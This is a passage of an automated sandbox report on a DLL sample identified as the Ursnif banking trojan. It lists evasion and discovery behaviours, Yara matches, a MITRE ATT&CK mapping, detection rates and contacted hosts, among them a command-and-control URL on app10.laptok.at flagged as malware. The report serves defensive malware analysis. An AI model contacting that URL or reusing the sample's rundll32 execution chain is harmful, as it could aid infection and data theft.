Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6336	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 144 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 32 > 30	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_00FC4E9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A74E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_00A74E9C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E051F31 LoadLibraryA,GetProcAddress,

0_2_6E051F31

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E0642AD __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_6E0642AD

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E09F906 mov eax, dword ptr fs:[00000030h]	0_2_6E09F906
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E09F83C mov eax, dword ptr fs:[00000030h]	0_2_6E09F83C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E09F443 push dword ptr fs:[00000030h]	0_2_6E09F443
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E09F906 mov eax, dword ptr fs:[00000030h]	2_2_6E09F906
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E09F83C mov eax, dword ptr fs:[00000030h]	2_2_6E09F83C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E09F443 push dword ptr fs:[00000030h]	2_2_6E09F443
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E09F906 mov eax, dword ptr fs:[00000030h]	3_2_6E09F906
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E09F83C mov eax, dword ptr fs:[00000030h]	3_2_6E09F83C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E09F443 push dword ptr fs:[00000030h]	3_2_6E09F443
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E09F906 mov eax, dword ptr fs:[00000030h]	5_2_6E09F906
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E09F83C mov eax, dword ptr fs:[00000030h]	5_2_6E09F83C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E09F443 push dword ptr fs:[00000030h]	5_2_6E09F443

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		0_2_6E051566
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		2_2_6E051566

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FC3946 cpuid

0_2_00FC3946

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E051979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6E051979

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E05146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E05146C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FC3946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00FC3946

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.bb8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.6b8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ff8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32c8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.bb8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.6b8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ff8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32c8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information2	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection12	Software Packing2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery34	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection12	Cached Domain Credentials	Security Software Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
a04.dll	59%	Virustotal		Browse
a04.dll	17%	Metadefender		Browse
a04.dll	71%	ReversingLabs	Win32.Trojan.Johnnie
a04.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.32e0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
5.2.rundll32.exe.6b0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.fc0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
2.2.regsvr32.exe.a70000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
app10.laptok.at	13%	Virustotal	Browse
prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud	0%	Virustotal	Browse
a97adde81b00f2ca4.awsglobalaccelerator.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://x.bidswitch.net/ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1	0%	Avira URL Cloud	safe
https://rtb.mfadsrvr.com/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg	0%	Avira URL Cloud	safe
https://rtb.mfadsrvr.com/ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375	0%	Avira URL Cloud	safe
https://btloader.com/tag?o=6208086025961472&upapi=true	0%	URL Reputation	safe
https://x.bidswitch.net/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1	0%	Avira URL Cloud	safe
http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX	100%	Avira URL Cloud	malware
http://app10.laptok.at/favicon.ico	100%	Avira URL Cloud	malware
